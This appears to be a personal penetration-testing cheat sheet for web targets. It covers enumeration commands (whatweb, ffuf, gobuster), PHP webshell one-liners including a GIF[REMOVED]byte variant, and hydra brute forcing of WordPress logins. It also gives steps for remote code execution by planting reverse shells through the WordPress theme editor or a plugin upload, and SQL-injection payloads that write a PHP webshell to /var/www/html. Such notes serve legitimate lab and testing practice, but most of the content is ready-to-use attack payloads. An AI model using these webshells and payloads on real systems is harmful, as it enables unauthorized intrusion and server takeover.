
### Initial Enumeration

Identify software used on target:
```bash
whatweb <IP>
nikto -h <IP>
```
--> Wappalyzer plugin

Check HTTP headers:
```bash
curl -IL http://<IP>
```

Subdomain enumeration:
```bash
ffuf -w /usr/share/wordlists/dirb/big.txt -u http://<domain>/ -H "Host: FUZZ.<domain>" -fl 338
gobuster vhost -u http://<domain> -w /usr/share/wordlists/dirb/big.txt
```

Fuzz files & directories:
```bash
# Feroxbuster
feroxbuster --url <IP>

# Gobuster
gobuster dir -u http://<IP>/ -w /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://<IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir -u http://<IP>/ -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,zip

# Dirsearch
dirsearch -u <IP>
```



### Webshells

Basic & Small:
```bash
<pre><?php system($_GET["cmd"]); ?></pre> # ?cmd=id
<?='$_GET[0]'?> # ?0=id
```

With GIF magic byte:
```bash
GIF89a;
<pre><?php system($_GET["cmd"]); ?></pre>
```

Advanced webshell: [link](https://github.com/alexandre-pecorilla/Binaries-Scripts/blob/main/topchef.php)





### File upload bypass






### Wordpress

Wpscan (includes user enumeration):
```bash
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url <URL> --plugins-detection aggressive
```

Enumerate usernames and brute force wp-login.php:
```bash
hydra -l <USER> -P /usr/share/wordlists/rockyou.txt <IP> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
```

Gain RCE once logged in:
1) Appearance → Theme Editor → edit 404 Template -> Add revshell
	1) `http://<IP>/wp-content/themes/twentytwelve/404.php`
2) Plugins -> Add New -> Upload php revshell (ZIP if doesn't work)
	1) `zip zip.zip php.php` || [Guide](https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell)
	2) Activate Plugin
3) Check installed plugins & themes for vulnerabilities



### SQL Injection


**SQL injection to RCE:**

If we have SQL Injection we can write a PHP webshell to the /var/www/html folder [Guide](https://aditya-chauhan17.medium.com/sql-injection-to-rce-dd538d49a7f)
```bash
' UNION SELECT '<?php system($_GET['cmd']); ?>' INTO OUTFILE '/var/www/html/shell.php' #

'# SQL server shell
mysql> Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/html/shell.php";
```

